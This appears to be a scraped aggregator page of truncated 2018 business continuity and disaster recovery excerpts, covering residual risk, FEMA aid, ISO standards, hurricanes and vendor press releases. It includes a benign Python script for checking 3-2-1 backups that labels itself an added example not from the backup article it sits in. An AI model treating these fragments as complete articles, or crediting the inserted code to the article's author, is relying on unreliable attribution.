If you are like over 85 percent of the people in the United States, then you do, according to the National Highway Traffic Safety Administration (via Wikipedia).

Does your organization’s business continuity program use the tool of residual risk to quantify the amount of exposure you have to natural, man-made and technological disasters?

If your program is like over 85 percent of programs in the U.S., then you don’t, according to informal surveys I take when I speak at business continuity functions around the country. In fact, I would say that over 95 percent of programs do not measure residual risk.



Deloitte’s Satish Lalchand outlines steps organizations can take to prepare an effective foundation for analytics-driven investigations and fraud monitoring, in the second installment of an article series on the future of forensics.

In recent years, traditional corporate antifraud measures have lost ground against ploys like procurement fraud, employee expense fraud, financial statement fraud, bribery and asset misappropriation. To identify potentially fraudulent transactions, organizations and regulators alike are leveraging integrated, data-driven analytics approaches—which work effectively if the data to be analyzed is top notch.

Data challenges in efforts to monitor fraud and conduct investigations include: vast amounts of data; inadequate data capture and storage; limited data accessibility; gaps in the skills required to process and analyze big data; static reporting; and a lack of diverse data to correlate findings.



(TNS) - On the ground once marked by devastation, a new city is rising.

The 1989 Loma Prieta earthquake battered the gritty South of Market district, damaging the Embarcadero Freeway that walled off downtown San Francisco from the bay and left city leaders with a choice: Do they repair and retrofit it, or envision something bolder?

They chose to go in a new direction. And nearly three decades after the temblor, this civic bet is beginning to take shape. The most obvious example is San Francisco’s new skyline, clustered in the South of Market area by design and now fueled by tech money.

The new $1-billion Salesforce Tower, which dwarfs any other skyscraper in the city, is getting the most attention. But it’s only part of the story. There is also a grand bus station and rooftop park set to open this summer.



In case you missed it, MHA Consulting CEO Michael Herrera last month conducted a webinar called “Your New BFFs – Compliance and Residual Risk.” (BFFs means Best Friends Forever, for those who haven’t been keeping up with their modern slang.)

The webinar is now available as a half-hour video which you can watch for free here.

The video is an excellent introduction to two concepts which are at the heart of contemporary business continuity management:

  • The importance of adopting and complying with a business continuity standard, and
  • The benefits of using the concept of residual risk to truly understand the capabilities of your business continuity program and develop a roadmap for its improvement.

We invite you to look at the video and check out the associated slide deck, since there is no substitute for letting Michael walk you through these concepts, if they are new to you.

However, because the content of the webinar is so fundamental, we thought it might be helpful in today’s post to give a thumbnail sketch of the concepts.



Improving safety is a key objective of most industries and boosting the quality of the products and services that contribute to safety is necessary to achieve it. The nuclear sector is set to benefit with a new ISO standard that does just that.

While major accidents in the nuclear sector are rare, the consequences are unimaginable, making the nuclear industry a highly regulated business. This includes the safety and quality requirements of those in the supply chain that supply products and services important to the sector’s safety.

A freshly published standard applies the principles of one of the world’s most renowned quality standards, ISO 9001, to the nuclear sector, combining best practice in quality with the specific requirements of the nuclear industry.



Manufacturing companies have a lot to consider when it comes to physical security. Not only do they have to think about protecting the people working in the facility and the products that they are producing but also their customer and employee information, financial records, product information/trade secrets, and much more.

Now, consider the added pressure of the daily news headlines reporting security breaches. Every day there seems to be another organization that falls victim to hackers. Leadership teams face tough decisions on how to allocate their security budget to try and protect their business from being the next one at risk. With cyber breaches happening so often, it’s understandable why companies are increasing cybersecurity budgets, but they shouldn’t put all their eggs in one security basket.

When physical security fails, it has the potential to put all security investments at risk. Think about a manufacturer’s server room. There may be data encryption and authentication to provide reliable security, but if someone breaks into the facility and walks off with the hardware, those measures alone may not protect the data.

For manufacturers, protecting physical security also means protecting information, personnel and product.

As manufacturing becomes increasingly connected, it’s vital that manufacturers adopt more modern security practices that go beyond a traditional perimeter security approach. It’s safe to assume that cybercriminals will get into your network at some point. Therefore, it’s important to make sure that the most important data is locked up in a way that intruders can’t touch it, even if they break in.



In 2018, MetricStream Research surveyed 120 respondents from 20 different industries to understand the level of GDPR awareness and preparedness across enterprises. A majority (53%) of the respondents who have implemented governance, risk, and compliance (GRC) solutions reported that they would be GDPR compliant by the May 25 deadline.

Download this report to learn more about the survey findings, including:

• The state of GDPR awareness and engagement
• The state of GDPR readiness
• GDPR compliance challenges, benefits, and spend

Access the complimentary copy of the report today.


Among the concerns about disaster recovery, assurance of recovery is the most important one for businesses. Data movers focus only on the test failover procedure. To achieve resilient recovery, organizations must run disaster recovery simulations on a weekly or monthly basis. Moreover, frequent short DR tests give the organization the confidence and experience necessary to respond to a real emergency. Practice makes perfect.

Organizations should be able to identify failures in the recovery plan before an actual disaster. It is a very challenging journey from an unknown and risky position to 100% recovery assurance. The demand for a thorough, frequent, automated DR test tool has become urgent. Organizations want to be ready for any disaster situation and to have recovery guaranteed.

During a real disaster, a lot of unexpected problems will pop up, so you must at least know that you are DR ready. Reliable disaster recovery is critical for business survival, and organizations don’t get a second chance when disaster strikes.

Without periodic testing, time has a way of eroding a disaster recovery plan’s effectiveness. Most organizations cannot tell whether they are really DR ready.

Environmental changes can prevent servers from powering on properly, and network problems such as MAC address, IP address and DHCP conflicts or dissimilar infrastructure can stop recovery. Applications may fail to run or databases may be inconsistent: we have seen customers change the number of servers running a certain application without realizing they had not updated the secondary site. A DC that cannot recover can shut down the entire site. There is also personnel dependency: staff turnover, missing knowledge, and availability (is the person onsite or away?). And in the end, all you get is a yearly test, which is far from enough.

An intelligent DR test should include:

  • Automated testing that cuts resources and saves money
  • Determining the feasibility of the recovery process
  • Identifying areas of the plan that need modification or enhancement
  • Demonstrating the ability of the business to recover
  • Identifying deficiencies in existing procedures
  • Increasing the quality and knowledge of the people who execute the disaster recovery

When disaster occurs, the organization gets one chance to recover. DR readiness is critical for business survival. Only frequent, short DR tests can address that need.

Uri Shay is the chief executive officer of EnsureDR Ltd., whose software simulates a disaster recovery process automatically and frequently.

Wednesday, 13 June 2018 14:19

Are You Disaster Ready?

(TNS) - As teams from the Federal Emergency Management Agency set out to do their first tours of the damage from powerful storms that devastated some Connecticut towns last month, two members of the state’s congressional delegation said every effort was underway to get federal assistance to help with the cleanup.

“The costs are in the tens of millions, if not the hundreds of millions of dollars,” U.S. Sen Richard Blumenthal said Monday morning outside the public works department in Hamden, one of the hardest-hit towns. “We don’t know the precise numbers but that’s why FEMA is here. They are going to be fanning out across the state.”

FEMA was called in at the request of the state and will spend the better part of the week doing preliminary assessments. They were joined by a number of teams from the state.

“We are committed to stay here as long as it takes to accomplish this mission,” said Diego Alvarado, a spokesman for FEMA.

Alvarado said the process for the state to get federal assistance is still in its early stages. The visit this week provides Gov. Dannel P. Malloy with the information to seek a disaster declaration and then the information goes to the president’s office for the necessary proclamation to approve assistance, officials said. The process, they said, could take months.



By TIFFANY BLOOMER, President, Aventis Systems

There’s screaming in the background. A window breaks. A peek around the cubicle reveals coworkers fleeing in terror while others hide hopelessly under their desks.

No, it’s not the end of the world. … It’s your network. Your systems failed, and critical, sensitive business data is lost permanently. It’s a data apocalypse, and your company is infected.

For any business to survive, it has to have availability. It must be up and running at all times for its customers, as well as its employees. Connections to business information must be reliable and continuous. This means backing up workstations and laptops, but also server and storage data, which is equally important.

With the exception of its employees, a business’s data is its most important asset, and a major loss can be fatal. Some 60% of small businesses that lose their data will shut down completely within just six months, yet the majority of small businesses still don’t back up their data. Why?

The good news is that downtime and lost data, productivity and revenue can be avoided if you are adequately prepared. Here are some top data backup survival tools every small business needs to avoid a data apocalypse:


Data Backup: Easy as Pi

To create a safe zone around your data, back up following this simple rule: Keep your data in three different places, on two different forms of media, with one stored offsite.

A single data center leaves you much more vulnerable than if your data is backed up in multiple places. IT best practices dictate redundancy — which includes the physical space. When the grid goes down and the zombies advance, it won’t help to have all your backup data stored in your office building.

To be safe, keep your original data plus multiple backups current at all times and store one offsite — as far away as possible! For added protection, store it in a weather-proof and fireproof safe at another geographic location.


Survival Tool #1: Backup Hardware

The first thing you need in your survival kit is the right storage device for your business environment and budget. There are four main types of backup hardware:

  • NAS — Network Attached Storage (NAS) is most often used for shared file systems joined by an ethernet network connection. It also works well for advanced applications such as file shares. Any server with attached storage can be used as NAS, allowing multiple servers or workstations to access data from a single network. The most scalable storage solution for SMBs, NAS storage equipment comes in a variety of configurable drive options and interfaces, is very versatile and includes a management interface.
  • SAN — A Storage Area Network (SAN) is a dedicated storage network for those requiring high-end storage capabilities. It provides block-level access to data at high speeds. Making large amounts of data more manageable, block-level storage allows you to control each block, or group, of data as an individual hard drive. SAN solutions are ideal for enterprise organizations because of their ability to transfer large data blocks between servers and storage.
  • DAS — Direct Attached Storage (DAS) is used to expand existing server storage with additional disks. It’s compatible with any server and is favored for its cost-saving benefits. It allows you to extend the size of your current box without an additional operating system. When used with a file server, DAS still allows user and application sharing.
  • Tape — Tape backup might be more “old school,” but it’s making a comeback in some SMB environments — primarily because it is offline. With tape, data is periodically copied from a primary storage device to tape cartridges, so you can recover it in case of a failure or hard disk crash. You can do manual backups or program them to be automatic. Tape is the least expensive way to store your data offsite because it’s light and compact, allowing you to take it with you or ship it to a holding space.

Survival Tool #2: Backup Software

If you have the right backup hardware in place, you need backup software you can trust to recover your data without compromising security.

Veeam Availability Suite is an excellent backup option for virtual machines (VMs) and physical servers. Software is managed through the same space as virtual backups. When disaster strikes, Veeam has your back with:

  • Guaranteed Availability — Get access to fast recovery time and recovery point objectives for all VM systems in less than 15 minutes for all applications and data.
  • Absolute Privacy — With licensing, your backup data is always secure with unique end-to-end encryption.
  • Long-Term Retention — Data is retained for as long as you need it with advanced native-tape support and direct-storage integrations with industry-leading storage providers like EMC, Hewlett Packard Enterprise and NetApp.
  • Built-In Disaster Recovery — With the high-level license, disaster recovery testing is built-in, and Veeam guarantees recovery point objectives of less than 15 minutes for all applications and data, as well as simplified proof of compliance with automated reporting.

Survival Tool #3: Cloud Services

When zombies, floods, hurricanes or other catastrophes wipe out the office, you’ll be glad you backed up your data offsite. Backing up everything in the cloud ensures it is always safe — no matter what happens.

What is cloud disaster recovery?

Simply put, cloud disaster recovery is a way to store and maintain copies of electronic data in a cloud storage environment to keep it safe. This way, if your system goes down, you can easily recover your company’s mission-critical data.

Why trust the cloud?

Some major benefits to managed services in the cloud include:

Business Continuity

While you’re recovering from an on-premises failure, cloud storage options will allow you to access mission-critical data and applications. As a result, your business can continue to function.

Lower Upfront Costs

Upfront costs are low, and ongoing costs are predictable, so you can more accurately budget your IT dollars.

More Time to Prep

By outsourcing data protection duties, your IT team can focus on more strategic issues.

Be Prepared

A system failure or loss of data can have catastrophic consequences on your business. To ensure you’re not left in the dark, learn more about the other tools you need and the steps you should take with this free e-book.

Choose backup hardware, software, a managed service provider and cloud storage to make sure your data is protected — no matter what or where disaster strikes. Also, don’t forget to test the local and remote backups to ensure the data you’re storing is usable.
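The two rules this article relies on, the 3-2-1 layout of copies and the reminder to test that stored backups are actually usable, can be turned into a routine check. The following is an added example and not code from the Aventis Systems article or from any backup product it names; the inventory format, the location and media names, and the file contents are constructed for illustration. The restore check compares a SHA-256 digest of each copy with the primary data, which is what you would do after restoring each copy to scratch storage.

```python
"""Check a backup inventory against the 3-2-1 rule and verify copies are restorable.

Added example (not from the article). Inventory layout, names and data are constructed.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class BackupCopy:
    location: str   # constructed label, e.g. "office-nas"
    media: str      # constructed media kind, e.g. "disk", "tape", "cloud"
    offsite: bool   # True if stored at another geographic location
    data: bytes     # bytes read back from the copy (embedded here so the example runs offline)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_3_2_1(primary: BackupCopy, copies: list[BackupCopy]) -> dict:
    """Report whether primary + copies satisfy 3 places / 2 media / 1 offsite,
    and which copies fail a restore check against the primary's digest."""
    everything = [primary, *copies]
    media_kinds = {c.media for c in everything}
    offsite = [c.location for c in copies if c.offsite]
    expected = sha256_hex(primary.data)
    corrupt = [c.location for c in copies if sha256_hex(c.data) != expected]
    three_copies = len(everything) >= 3
    two_media = len(media_kinds) >= 2
    one_offsite = len(offsite) >= 1
    return {
        "three_copies": three_copies,
        "two_media": two_media,
        "one_offsite": one_offsite,
        "corrupt_copies": corrupt,
        # A layout that passes 3-2-1 but holds an unreadable copy is not compliant:
        # the article's point is that stored data must be proven usable.
        "compliant": three_copies and two_media and one_offsite and not corrupt,
    }


# Constructed sample inventory: production disk, local NAS disk, and an offsite tape
# whose contents have drifted (simulating a bad restore or silent corruption).
PAYLOAD = b"customer-ledger-2018-06\n" * 64

PRIMARY = BackupCopy("production-server", "disk", False, PAYLOAD)
LOCAL_NAS = BackupCopy("office-nas", "disk", False, PAYLOAD)
BAD_TAPE = BackupCopy("offsite-tape", "tape", True, PAYLOAD[:-1] + b"X")
GOOD_TAPE = BackupCopy("offsite-tape", "tape", True, PAYLOAD)


def sample_report_with_corruption() -> dict:
    return check_3_2_1(PRIMARY, [LOCAL_NAS, BAD_TAPE])


def sample_report_after_fix() -> dict:
    return check_3_2_1(PRIMARY, [LOCAL_NAS, GOOD_TAPE])


def sample_report_all_local() -> dict:
    # Two disk copies in the same building: passes "three places" but fails media and offsite.
    second_nas = BackupCopy("office-nas-2", "disk", False, PAYLOAD)
    return check_3_2_1(PRIMARY, [LOCAL_NAS, second_nas])


if __name__ == "__main__":
    for name, report in (("corrupt tape", sample_report_with_corruption()),
                         ("fixed tape", sample_report_after_fix()),
                         ("all local", sample_report_all_local())):
        print(f"{name}: {report}")
```

In practice the `data` field would be filled by restoring each copy to scratch storage and reading it back; the point of the check is that a copy only counts once it has been proven restorable, which is the testing step the article asks you not to skip.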

You may not be able to predict the next tornado or save the world from walkers, but you can make sure your data survives!

About the Author

Tiffany Bloomer is president of Aventis Systems. Aventis Systems provides IT services and equipment to small and medium businesses around the world.

What could Barbra Streisand, John Wayne, Star Wars and The Sting possibly have in common? More than forty years ago, they were the most popular entities in popular culture as measured by the inaugural edition of The People’s Choice Awards.

Earning the People’s Choice award in the cloud storage/backup category provides confirmation that Cloud Recovery – AWS exceeds our customers’ expectations for managing their growing data, and driving down the cost of cloud-based recovery.

The People’s Choice Awards were created in 1974 to recognize the people and works of popular culture, as voted on by the public. And while the entertainment industry has always been well-represented in the culture wars, the business world now has its own People’s Choice Awards: The People’s Choice Stevie® Awards for Favorite New Products, a feature of The American Business Awards®, the U.S.A.’s top business awards program. Sungard Availability Services (Sungard AS) is proud to receive this year’s People’s Choice award for cloud/storage backup for its Cloud Recovery – AWS solution.

Debuting in 2002, the most recent worldwide public vote in The People’s Choice Stevie® Awards for Favorite New Products was conducted last month. The highest number of votes decides the winners in a variety of product categories. More than 58,000 votes were cast, and Sungard AS’ Cloud Recovery AWS was selected as the overall winner in the Cloud Storage/Backup category.



(TNS) - Imagine a job that involves managing the worst day of someone’s life dozens of times every day. Answering phone calls from scared or angry people for 10 hours or more at a time and coordinating a rapid response from multiple agencies. One mistake or misstep could have potentially fatal consequences.

This is the job description of a 911 dispatcher.

“They are a critical link in the public safety chain that is often overlooked because they’re not driving police cars or fire trucks,” said Flathead Emergency Communications Center Director Elizabeth Brooks. “They’re the first responders. They’re the first on scene even though they’re not physically there, and the quality of your response often starts with a skilled 911 dispatcher.”

However, the voice answering the phone belongs to a human being, one that must find a way to handle every crisis that occurs within their community.



(TNS) - Director of the Scioto County, Ohio, Emergency Management Agency Kim Carver said this week there is federal disaster relief money headed to Southern Ohio. Its arrival just may take longer than expected, she added.

“All Scioto County jurisdictions will be eligible for reimbursement for up to 87.5 percent of costs associated with response and recovery to the flooding in February, including flood defense costs in the city of Portsmouth and village of New Boston,” Carver said in comments made when the state was approved for FEMA assistance in mid-April.

A declaration of emergency was signed by President Trump April 19 in response to flooding and landslides that slammed the area Feb. 14-25. However, Carver said recently FEMA is using a new service model to deliver funds relating to the February disaster.



The world’s much anticipated International Standard for occupational health and safety (OH&S) has just been published, and is set to transform workplace practices globally.

ISO 45001:2018, Occupational health and safety management systems – Requirements with guidance for use, provides a robust and effective set of processes for improving work safety in global supply chains. Designed to help organizations of all sizes and industries, the new International Standard is expected to reduce workplace injuries and illnesses around the world.

According to 2017 calculations by the International Labour Organization (ILO), 2.78 million fatal accidents occur at work yearly. This means that, every day, almost 7 700 persons die of work-related diseases or injuries. Additionally, there are some 374 million non-fatal work-related injuries and illnesses each year, many of these resulting in extended absences from work. This paints a sober picture of the modern workplace – one where workers can suffer serious consequences as a result of simply “doing their job”.

ISO 45001 hopes to change that. It provides governmental agencies, industry and other affected stakeholders with effective, usable guidance for improving worker safety in countries around the world. By means of an easy-to-use framework, it can be applied to both captive and partner factories and production facilities, regardless of their location.



Monday, 11 June 2018 14:40

ISO 45001 is now published

Disasters come in many forms. Corruption, theft, loss, or natural disaster can all take down your applications and destroy your data. In an ideal world, your data protection infrastructure would immediately restore all applications and data right at the time and point of failure.

But this is the real world. It is possible to fail over an application immediately and to continuously replicate its data for near-zero loss. But these operations are resource-consuming and expensive. Realistically, IT needs to set different recovery time and point objectives according to budget, resources and application priority.

We call these two objectives Recovery Time Objective (RTO) and Recovery Point Objective (RPO). They are related, and both are necessary for application and data recovery. They are also different metrics with different purposes.



The 2017 hurricane season was one for the record books, with four major storms and three more minor ones impacting the U.S. and the Caribbean.

What’s worse, several of them hit land in more than one location — causing additional devastation. There were hundreds of millions of dollars in damage and over 100 deaths attributed to the four main storms alone, making 2017 the costliest hurricane season on record for the United States. Ten of the total 17 named storms for the year reached what is considered hurricane force. When you consider the amount of damage and loss of life, you have to consider: is there any way that businesses and individuals could have been more prepared?

The Major Hurricanes of 2017

The four major hurricanes of 2017 were named Harvey, Irma, Maria and Nate. Starting life as tropical cyclones off the shoreline of the U.S. and the Caribbean, they devastated locations such as Puerto Rico, the Dominican Republic, Louisiana and South Texas. Hurricane Harvey lingered over Texas and Louisiana, making landfall multiple times and causing over $180 billion in damages. More than 30,000 support personnel at the federal level were mobilized to help with cleanup and support efforts. Hurricane Irma came next, with serious storm damage occurring in the Florida Keys and the Caribbean, specifically on the island of Barbuda where more than 90% of buildings were damaged. Irma was “only” a Category 4 storm, but she left behind nearly $200 billion in damages, killed 129 people and caused 40,000 federal personnel to be mobilized.

Hurricane Maria had a catastrophic impact on Puerto Rico, where the Category 4 hurricane stripped the island’s 3.4 million inhabitants of power and basic necessities. While the small country continues to rebuild, it will take years to restore everything that was damaged. Nineteen thousand federal personnel were dispatched to help support the area, where an estimated $95 billion in damages were caused by the storm. Hurricane Nate was the weakest of the four, barely reaching a Category 1 with limited power to cause widespread devastation. Louisiana, Mississippi and Alabama were hardest hit by the 90 mph winds. Damage was worse in South America where Nate was strongest — causing extensive flooding, landslides and 45 deaths.



It’s Time to Take Data to the Next Level

The self-service technology culture allows each business user to access data for analytical purposes. Yet it has created an abundance of rogue data sets across enterprises that may contain outdated or inaccurate information and that fall outside of the organization’s data governance structure. With the introduction of the right data intelligence strategy and stewardship, enterprises can improve data quality, build trust and enable collaboration that will impact the bottom line.

Data is the lifeblood of an organization. It is at the heart of executive decision-making, risk evaluations, customer engagement, regulatory requirements and efficient operations. Yet, not all data used for these business decisions and reporting is made equal.

According to a recent TDWI survey report, “Reducing Inefficiency and Increasing the Value of Analytics and Business Intelligence,” only 11 percent of respondents said they were very satisfied with their companies’ investments in data and analytics projects to meet strategic goals for enabling data-driven decision-making or actionable customer intelligence.

The problem is that the self-service culture has created an abundance of rogue data sets and proliferated data across the enterprise where governance officers and IT professionals have no control over who is using the data and how they’re using it. Business users may be using outdated or inaccurate data for their analysis.

And there is no way to reel back data access as these same self-service analytical, visualization and data preparation applications allow enterprises to be nimble and use data for finding meaningful business insights. The trick is finding the balance between open data access and internal data control: Effective governance and data quality improvement only come when the right data intelligence strategy and stewardship is in place.



Every year in the June issue of CRN, The Channel Company publishes its Women of the Channel list citing the professional accomplishments, demonstrated expertise and ongoing dedication to the channel of hundreds of women. The Power 100 is a more focused list of women drawn from this larger list: women leaders whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

Sungard Availability Services (Sungard AS) has the privilege of employing women who are named to this prestigious list year after year, and this year was no different. Six women – including two of whom were named to the Power 100 – were selected for the Women of the Channel 2018 list.

Six members of the Sungard AS team were selected for the Women of the Channel 2018 list. Two were named to the Power 100 list.

“They’re all visionaries whose continued dedication and contributions make possible our mission to improve business resiliency,” said Tim Cecconi, Senior Vice President, Sales and Global Channels. “These executives are some of the best and brightest Sungard AS has to offer, and their demonstrated influence throughout the channel serves as a testament to the exceptional talent and innovation they bring to the industry.”

Being chosen for the Women of the Channel list is an honor no matter who you are. But Sungard AS wanted to know more about why their candidates were selected, and what qualities they think enable them to achieve success. Here is what Melissa McCoy, Michelle LeVan, Karen Falcone, Corre Curtice, Sarah Hamilton and Heidi Biggar have to say about the qualities that make successful women leaders:



I had an interesting week last week: Along with two other MHA consultants, I spent two and a half days performing a current state assessment of the business continuity situation at a large complex of hospitals on the West Coast.

We conducted 15 to 16 interviews with the key people at a wide range of departments to get a handle on where their BC program stands on everything from program administration to IT Disaster Recovery to fire and life safety.

It was an interesting challenge. In doing an assessment like that, your goal is to arrive quickly at an accurate understanding of the program’s strengths and weaknesses in the different areas. You have to work collaboratively with experts in many departments, gathering material that you will eventually structure into a report which includes, critically, a list of the steps the organization can take to help them improve their BC program and better carry out their core mission. This list is known as the roadmap.



Memorial Day Weekend 2018 was a deluge for many parts of the country.

Flash floods ripped through Ellicott City, Maryland. Subtropical storm Alberto triggered states of emergency in Florida, Mississippi and Alabama. Severe thunderstorms and tornadoes tore through the West and Midwest.

Amid all this, the National Weather Service (NWS) experienced an outage from Sunday evening into Monday, leaving meteorologists unable to access the weather data the NWS provides.

The National Weather Service experienced an outage on Memorial Day Weekend, leaving meteorologists unable to access the weather data the NWS provides.

It turns out the NWS switched to a new system for distributing data in recent years, and AccuWeather and other consumers of that data have expressed concerns about how the system would handle spikes in requests for data during major storms. Those fears weren’t unfounded.

It’s not the first time the NWS had an outage, either. There were several in 2014 due to firewall issues and in one case, too many requests from an Android app. In February 2017, two of the NWS’s core routers lost power. The Network Control Facility tried to switch over to a backup site, but failed. With both the primary and the backup unavailable, forecasts, warnings and other data went dark for nearly three hours.



As if it’s not enough that communities hit by disaster have to go about rebuilding, it’s inevitable that the suffering will attract scammers, sometimes called “storm chasers”: companies that target vulnerable communities rebounding from a disaster, and other scam artists.

That’s what the Indiana Department of Homeland Security is warning residents about in the 35 counties that received emergency declarations earlier this year after severe flooding.

These scammers will go door-to-door offering repairs and often do subpar work or don’t complete the work after receiving payment, which they often request up front.

“It’s sad that there are people out there who would take advantage of people who are distraught and have been through a horrible disaster and may be elderly or disabled,” said Erin Rowe, state director of emergency response and recovery for the Department of Homeland Security (DHS). “They call them storm chasers and there are some individuals and groups who have been identified.”



EAGLEVILLE, Pa. – BC in the Cloud, an integrated platform for business continuity and disaster recovery planning, today announced it will be exhibiting at the Disaster Recovery Journal’s Fall Conference “Reimagining Business Resiliency.”

The conference will be held Sept. 23-26, 2018, at the JW Marriott Desert Ridge Resort and Spa in Phoenix, Ariz. BC in the Cloud will be showcasing its platform in Booth 506/508. Along with speaking in the Solutions Track, Andrew Witts will present Program Totality – Managing the Connectivity and Completeness of an Entire Program.

“We’re excited to have BC in the Cloud as a sponsor of our fall show,” said Bob Arnold, President, DRJ. “They have always been one of the industry thought leaders and we are thankful to have their support and sponsorship for our Fall 2018 conference.”

“BC in the Cloud is looking forward to exhibiting at another successful DRJ Conference. Our platform can do so many amazing things, it’s great to be able to show it off in person to the DRJ attendees,” said Frank Shultz, President, BC in the Cloud.

The Disaster Recovery Journal’s conferences are the world’s largest conferences dedicated to business resiliency and expect more than 1,000 professionals who are responsible for building business resiliency and managing disaster recovery in their organizations. With more than 65 sessions, 10 deep dive workshops and 70 companies in the expo hall, attendees can participate in interactive sessions, hands-on training with cutting-edge technology, hundreds of live demos and unparalleled networking. In addition, DRJ welcomes over 85 speakers who will share their expertise and lessons learned in the fast-paced, ever-changing environment that is the new normal. DRJ’s Fall Conference offers attendees everything they need to build a resilient organization in four days, under one roof.

To arrange a meeting or personal demo at the conference, contact BC in the Cloud by email or at 267-341-9610.

About BC in the Cloud

BC in the Cloud provides automated tools and services for building and maintaining effective plans that streamline and simplify Continuity, Governance and Risk Management programs. The BC in the Cloud Platform evolves as an organization’s needs grow to increase resiliency, mitigate risk, and adhere to deadlines. No other platform provider offers rapid speed-to-market and robust scalability in an all-in-one solution.


Engagement, Collaboration, and Data

A number of technologies are providing significant advances for IT auditors to embrace the digital age with proactive information that provides an even greater value to businesses.

Organizations everywhere are progressing on their digital journeys at a healthy clip. They’re evaluating and adopting new technologies quickly and compressing the time it takes for a project to go from concept to implementation. In this fast-paced, technology-driven climate, IT auditors and IT audit functions must also evolve and transform, with no time to waste.

IT auditors need to be more agile, dynamic and progressive in the ways they assess potential risks in IT initiatives and the overall IT environment. And they can start by stepping up their engagement and alignment with IT and business stakeholders across the organization.



Wednesday, 06 June 2018 15:23

Transforming IT Audit In The Digital Era

It seems the first question asked for any task is, “Is there an app for that?”

Much of what we do in business continuity is planning and protecting systems and applications. Quite a bit of what we do is manual, but in recent years, vendors have created software which can help business continuity programs in carrying out nearly every phase of their missions. These tools make BC activities more efficient, effective, and accurate, increasing the resilience of the organizations that deploy them.

Tools are available to help BC programs with the following activities, to name a few:



Wednesday, 06 June 2018 15:22

BCM Software: There’s An App for That

Emergency managers and the many different disciplines and organizations they partner with are working every day to make their communities a safer and better place to be; before, during and after a disaster. 

Having cut my teeth here on the West Coast, I have always envied emergency managers who have hurricanes as their worst-case disaster. This is for two reasons. One is that they have a set schedule on the calendar that is identified and known as the hurricane season, which, by the way, just started on June 1, and was preceded by Tropical Storm Alberto. Evidently Alberto did not get the save-the-date message and arrived a few days early.

Secondly, you can see hurricanes and tropical storms coming days, even weeks out as they form in the Atlantic or Gulf of Mexico. With our 24-hour news cycle, even the people who are procrastinators will finally run to the hardware store to get plywood and to the grocery store for canned food and water. People have time to heed warnings and evacuate from danger areas.



Wednesday, 06 June 2018 15:20

Earthquake Country Needs a Sense of Urgency

Keep energy flowing. Keep real estate protected. Keep medicines available.

From energy suppliers to global real estate brokers to national pharmacies, companies around the world are becoming increasingly digital. Organizations are adopting cloud, embracing IT transformation and adding modern, agile and efficient methods to harness the power of their business backbone: data. And with that unprecedented growth in information and analytics, data protection has evolved.

As a result, corporations are embracing solutions like Cloud Based Recovery for Actifio environments from Sungard Availability Services (Sungard AS) to back up their data and achieve virtual recovery more efficiently.

During the annual Actifio Data Driven conference (June 5-6), companies can explore new, efficient ways to achieve data protection.

Backed by 40 years of data protection and recovery experience, Sungard AS partnered with Actifio over three years ago to deliver a managed data replication and recovery solution to help customers achieve data protection transformation. With several petabytes 



SATA is a well-known technology in data storage circles, but what about M.2?

It's common to encounter M.2 solid-state drives (SSDs) while browsing a vendor's website or the virtual shelves of an online store. They typically lack enclosures — although many accessory makers offer cases for external use — and look like a cross between a memory stick and a small expansion card, complete with exposed chips some of which may be covered by a big sticker from the manufacturer.

What's the difference between these two storage technologies?



Wednesday, 06 June 2018 15:18

M.2 vs SATA: Storage Showdown

Digital transformation. We hear this term used in many different contexts in our day-to-day conversations. Regardless of when or how it is used, one thing is clear: digital transformation could be the key to ensuring an organization’s survival over the next several years. During the recent Enaxis Leadership Forum, attendees were asked what they believed to be the biggest barriers they faced to achieving the benefits of digital transformation:

  • Business Reorganization
  • Change Resistance from Leadership
  • Legacy Operating Models
  • Cost and Complexity of Cyber Threat Management
  • Lack of Digital Skills in Current Workforce

As we review these barriers, one thing is evident – these are the same barriers that organizations face for ANY type of transformation – not just digital. In the past, successful and forward-thinking companies have found ways to overcome these types of barriers to achieve their end goal – organizational transformation.



Wednesday, 06 June 2018 15:16

NOAA recently released their 2018 hurricane predictions and the Atlantic and Gulf coasts are expected to have a near- or above-normal season. Secretary of Commerce Wilbur Ross said, “The devastating hurricane season of 2017 demonstrated the necessity for prompt and accurate hurricane forecasts.” The same could be said about communications.

As businesses and organizations craft their hurricane preparedness plans, it is vital to business continuity and employee safety that hurricane communications are relevant and can be sent rapidly as conditions change. The fastest way to ensure every employee receives the right message at the right time is to utilize hurricane notification templates. Modern emergency communications solutions will provide templates that companies can send across all communication channels, including email, text, push notifications and phone calls.



Security and resilience – Business continuity management systems – Guidelines for people aspects of business continuity

This document gives guidelines for the planning and development of policies, strategies and procedures for the preparation and management of people affected by an incident.

This includes:

  • preparation through awareness, analysis of needs, and learning and development;
  • coping with the immediate effects of the incident (respond);
  • managing people during the period of disruption (recover);
  • continuing to support the workforce after returning to business as usual (restore).

The management of people relating to civil emergencies or other societal disruption is out of the scope of this document.



Wednesday, 06 June 2018 15:09

ISO/TS 22330:2018

Top 5 Best Practices for Data Management

In today’s data-driven digital economy, traditional databases struggle to keep up with the increasing amount of streaming data. Adding to this stress are new compliance regulations, such as GDPR, that often complicate core processes across industries, including financial services. This article will discuss how financial service organizations can keep pace with growing data compliance requirements without compromising speed or impacting business activities.

Analyst firm IDC predicts that by 2025 the global ‘datasphere’ will swell to a staggering 163 zettabytes of data generated per year – that’s ten times the data generated in 2016. In today’s data-driven digital economy, traditional databases struggle to keep up with increasing amounts of data that stream in faster than ever. Compounding the challenges created by the dramatic increase in both the speed and scale of data is the broad impact of new data management and compliance regulations that often complicate core processes across every industry, including financial services.

Many financial services organizations comply with existing regulations, such as Basel III, FFIEC, Sarbanes–Oxley and the Markets in Financial Instruments Directive (MiFID II), along with the Fundamental Review of the Trading Book (FRTB) requirements that went into effect in January. On deck is the General Data Protection Regulation (GDPR). Effective May 25, 2018 and issued by the European Union (EU), GDPR requires that any organization that handles data from an EU resident must be compliant. This includes providing increased transparency when reporting a security or confidentiality breach to regulators and those whose data is affected, all within specified timeframes.

The ever-increasing list of regulations is forcing financial services organizations to button up data management best practices. To better manage growing data volumes and effectively limit risks associated with compliance regulations, these organizations are breaking down data silos to provide better visibility and integration across the enterprise. However, as financial services organizations modernize their data infrastructures, they are often challenged to balance evolving compliance regulations with additional demands of their data, such as those around customer experience and operational productivity.



You’ve reviewed all the benefits and determined that your organization needs a mass notification system.

